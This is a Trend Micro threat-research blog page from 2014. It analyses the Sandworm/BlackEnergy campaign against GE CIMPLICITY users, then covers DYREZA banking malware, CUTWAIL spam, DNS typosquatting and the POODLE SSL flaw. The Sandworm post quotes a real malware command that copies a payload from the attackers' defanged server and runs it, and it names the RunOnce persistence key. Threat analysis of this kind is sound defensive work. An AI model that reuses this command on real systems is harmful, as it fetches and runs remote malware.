Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
  • About Us

    On October 14th, a report was publicly released regarding the Sandworm team.  After beginning an investigation into the affiliated malware samples and domains, we quickly came to realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform’s CIMPLICITY HMI solution suite.   We have observed this team utilizing .cim and .bcl files as attack vectors, both of which file types are used by the CIMPLICITY software.  As further proof of the malware targeting CIMPILICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.

    Figure 1. Strings showing environment variable

    CIMPLICITY is an application suite that is used in conjunction with SCADA systems.  A key component of any SCADA system is the HMI. The HMI (which stands for Human-Machine interface) can be viewed as an operator console that is used to monitor and control devices in an industrial environment. These devices can be responsible for automation control as well as safety operations.

    Figure 2 below shows an example of where HMIs can be found in an electric power delivery system. Additionally, you may find HMIs in the corporate network that are being used for design, development, and testing.

    Figure 2. Sample SCADA System

    It is important to note that we are currently seeing CIMPLICITY being used as an attack vector; however, we have found no indication that this malware is manipulating any actual SCADA systems or data. Since HMIs are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network.

    What Drew Our Attention?

    When looking closer at the recent Sandworm Team report, we started to pivot off several of the C2’s that were identified in the report. Again, we aren’t aware of any attacks against SCADA devices directly utilizing anything that we discuss below.

    One of the C2’s that drew our immediate attention was 94[.]185[.]85[.]122. We pivoted off this C2, and located a file called config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e). This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object oriented file for GE’s Cimplicity SCADA software suite, used to administer SCADA devices.

    Figure 3. CimView/CimEdit Example

    In config.bak, there are two events that are defined: OnOpenExecCommand and ScreenOpenDispatch.

    The handler of OnOpenExecCommand is the following command line:

    cmd.exe /c "copy \\94[.]185[.]85[.]122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"

    It’s important to note the variable %CIMPATH% is used for the drop location of default.txt. This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94[.]185[.]85[.]122/newsfeed.xml, saves and executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process.

    We currently do not have a sample of newsfeed.xml or {random 41 character hex string}.wsf that can be analyzed for further detail. This event mechanism does not seem to exploit vulnerabilities; it’s comparable to AutoOpen and AutoExec in Microsoft Office.

    In addition to config.bak being a CimEdit/CimView file, there is a reference to devlist.cim (MD5: 59e41a4cdf2a7d37ac343d0293c616b7), which is a Cimpack Design Drawing File.

    The default.txt file copied from the C2 in the above command structure drops and executes %Startup%\flashplayerapp.exe, then deletes itself after execution. Flashplayerapp.exe is capable of issuing the following commands:

    • exec
    • lexec
    • die
    • getup
    • turnoff
    • chprt

    In addition to config.bak and default.txt being of interest, another file – shell.bcl (MD5: bdc7fafc26bee0e5e75b521a89b2746d) drew our attention. It is a script designed to run in the Basic Control Engine; .bcl files are used heavily throughout SCADA systems to automate certain functions. In Cimplicity, .bcl files are used for creating scripts to help automate functions. Shell.bcl executes 94[.1[85[.]85[.]122\public\xv.exe directly.

    Based on the strings in shell.bcl, xv.exe is supposed to exploit the system vulnerability. We don’t currently have a copy or hash for xv.exe or Flashplayerapp.exe available to confirm this assumption.

    Open Directories

    During the course of regular threat intelligence gathering, we often look closely at the C2 server that attackers are using to communicate and drop/upload files to and from victim machines.

    In the case of 94[.]185[.]85[.]122, in addition to config.bak, we were able to pull down additional malware files that the particular actors were using from the C2. A few of the notable files found on the C2 can be found below. These files may or may not have been used in conjunction with attacks involving SCADA devices.

    Spiskideputatovdone.ppsx (MD5: 330e8d23ab82e8a0ca6d166755408eb1), which means deputy list in Russian, has been tied to an email address based on VirusTotal submissions. This file is a PPSX file that downloads/loads  94[.]185[.]85[.]122\public\slide1.gif and 94[.]185[.]85[.]122\public\slides.inf (MD5: 8313034e9ab391df83f6a4f242ec5f8d). The downloaded file slide.inf renames the local file slide1.gif to slide1.gif.exe and adds the registry entry HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce Install=”{dir}\slide1.gif.exe”. Oleh Tiahnybok is a Ukrainian politician with outspoken anti-Russian views.

    Slide1.gif.exe (MD5: 8a7c30a7a105bd62ee71214d268865e3) drops FONTCACHE.DAT  (MD5: 2f6582797bbc34e4df47ac25e363571d) and deletes itself after execution. FONTCACHE.DAT is a version of the Black Energy bot capable of executing the following commands on the system:

    • delete
    • ldplg
    • unlplg
    • update
    • dexec
    • exec
    • updcfg


    As we have seen, these are pieces of a very complex targeted attack that is seemingly focused on GE Intelligent Platform CIMPLICITY users.  We have, at present, found no indications that this malware is actually manipulating physical SCADA systems or their resultant data.

    As we continue the investigation into this targeted attack, be sure to check back as we will keep you up to date on our findings. All of the samples listed in this blog are currently caught by Trend Micro under the name BKDR_BLACKEN.A and BKDR_BLACKEN.B.

    Special thanks to the entire Forward-Looking Threat Research Team, Christopher Daniel So, Mark Joseph Manahan and the Ottawa Deep Security Labs

    Update as of October 17, 2014, 12:35 A.M.

    An earlier version of this post included several incorrect hashes. These have now been corrected.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Cybercriminals and threat actors often use tried-and-tested vulnerabilities in order to infect user systems and consequently, penetrate an enterprise network. This highlights the importance of patching systems and keeping software and applications up-to-date.

    We recently spotted DYREZA malware leveraging an old vulnerability found existing in Adobe Reader and Acrobat and covered under CVE-2013-2729. Accordingly, once this vulnerability is successfully exploited it could lead to the execution of arbitrary code on the affected system.



    Figures 1-2. Screenshots of spam emails

    DYREZA malware uses spammed message that purports to be an invoice notification as its infection vector. It has a malicious .PDF file attachment, detected by Trend Micro as TROJ_PIDIEF.YYJU. When executed, it exploits the CVE-2013-2729 vulnerability, which leads to the download of TSPY_DYRE.EKW, a variant of DYREZA (also known as DYRE and DYRANGES).

    DYREZA is a malware known for stealing banking credentials and associated with parcel mule scams. We recently wrote a blog post detailing the role that this malware plays in the threat landscape ecosystem and some of its notable behavior, including its capability to perform man-in-the-middle (MITM) attacks via browser injections, monitoring online banking sessions of targeted banks, and stealing other information such as browser versions, snapshots, and personal certificates.

    Users and enterprises are at risk since DYREZA can get other types of data such as personal identifiable information (PII) and credentials via browser snapshots. Aside from this, we also reported that the CUTWAIL botnet leads to the download of both UPATRE and DYRE malware.

    What makes TSPY_DYRE.EKW notable is its ability to steal crucial information via injecting malicious codes onto certain banking and bitcoin login webpages.  Some of the bitcoin pages it monitors are:


    Apart from its information stealing routines, TSPY_DYRE.EKW has the capability to connect to certain malicious websites to send and receive information. Moreover, it can connect to specific STUN (Session Traversal Utilities for NAT) servers to determine the public IP address of the compromised computer. As such, cybercriminals can find out the location of the malware or possibly determine the affected users’ and organizations’ locations. The top country victims are Ireland, United States, Canada, Great Britain, and Netherlands.

    Bitcoin is a digital currency that has real world value. Cybercriminals often go after bitcoins since it presents a new venue for them to generate profit. While this is not the first instance that scammers and cybercriminals target bitcoins, this new attack highlights how traditional threats like exploits and banking malware remain to be a relevant means for cybercriminals to steal both user credentials and hit a relatively new platform – bitcoins.  It also teaches us an important lesson about keeping systems and software applications updated to its latest version.

    Trend Micro protects users from this threat via its Smart Protection Network that detects the spammed message and all related malware.

    With additional analysis from Rhena Inocencio, Karla Agregada, and Michael Casayuran

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    A new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, that ultimately downloads its final  payload- a BANKER malware related to the DYREZA/DYRE banking malware.


    In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling to more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009.

    We spotted some spammed emails that disguise itself as invoice message notifications or “new alert messages” from various companies and institutions.

    Figure 1. Screenshots of spammed messages related to CUTWAIL/PUSHDO


    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    The Domain Name System (DNS) plays a vital role in the operation of the Internet. Over the years, it has been a primary target for malicious users looking for vulnerabilities in its protocol and infrastructure.
    Some examples include cache poisoning attacks, vulnerable DNS server implementations, and bogus user interactions.

    Taking advantage of users’ spelling mistakes

    Misspelled domain names in the browser’s address bar are a common user mistake, which attackers were quick to take advantage of. Attackers register the “squatting” or misspelled version of victim domains in order to capitalize on the potential incoming traffic. They eventually use these domains for a wide range of unethical and illegal ways, which may include exfiltration of user credentials through phishing. (more…)

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Earlier today, Google researchers Bodo Möller, Thai Duong, and Krzysztof Kotowicz released a paper discussing a serious bug in SSL 3.0 that allows attackers to conduct man-in-the-middle attacks and decrypt the traffic between Web servers and end users.

    For example, if you’re shopping online with your credit card, you may think that your information is secure but thanks to this bug (known as POODLE) it may actually be at risk. An attacker can hijack your transaction, retrieve your credit card information, or even change your order.

    The bullet points below summarize some key points of this vulnerability:

    • CVE ID: CVE-2014-3566
    • Popular name: POODLE (Padding Oracle On Downgraded Legacy Encryption)
    • Vulnerabilty: SSL 3.0 fallback bug
    • Attack vector: Man-in-the-middle

    How does the POODLE attack work?

    According the paper, the key issue is the integrity of the padding on SSL 3.0 block ciphers. This padding is not verified by the protocol. This will allow an attacker to alter the final block of the SSL cipher if the hacker can successfully hijack the connection from an end user to the Web server. This can lead to the attacker being able to successfully decrypt any encrypted traffic that they are able to capture.

    SSL 3.0 is an older encryption protocol that has been around for 15 years. It has been succeeded by TLS (which is now at version 1.2). However, TLS clients and servers will downgrade to earlier versions of the protocol if one side of the transaction does not support the latest version.

    Consider the example below. The browser supports version of TLS up to 1.2. In the first handshake, the browser uses the highest protocol version (TLS 1.2) that it supports. If that handshake fails, the browser will retry with earlier versions (TLS 1.1, then TLS 1.0). The attacker then will make it so the browser will downgrade versions up to SSL 3.0, at which point the POODLE vulnerability can then be exploited to decrypt any communications between the two parties.

    Sniffer 2-01

    Figure 1:  Attackers may force the communication between a client and server to downgrade from TLS to SSL 3.0 to be able to decrypt the network communication


    This vulnerability can be avoided if the SSL 3.0 protocol is disabled. Site administrators can disable support for this on their side; for example these instructions show how to do this in Apache.

    End users can disable SSL 3.0 support on their end as well, through the following steps:

    • For Chrome users, running Chrome with the command Chrome.exe  –ssl-version-min=tls1 will specify that the minimum version of SSL that will be used is TLS 1.0.
    • In Firefox, type about:config in the search bar to change settings. Search for the keyword security.tls.version.min and set the value to 1 to disable SSL 3.0 support.
    • Internet Explorer users can follow the steps in Security Advisory 3009008 to disable SSL 3.0

    For enterprises they can do server patch via the following steps:

    Note, however, that disabling SSL3.0 is not a practical step for all users, especially since it can still be needed to work with legacy systems. The security advisory from recommended the usage of TLS_FALLBACK_SCSV mechanism to web servers, to ensure that SSL 3.0 is used only when necessary (when a legacy implementation is involved). This way, attackers can no longer force a protocol downgrade.

    We will continue to proactively monitor for threats that use this vulnerability and provide updates and solutions as necessary.

    Update as of 1:48 PM, October 15, 2014

    Trend Micro Deep Security customers are protected from attacks that may leverage POODLE vulnerability via the following DPI rules:

    • 1006293 – Detected SSLv3 Request
    • 1006296 – Detected SSLv3 Response
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice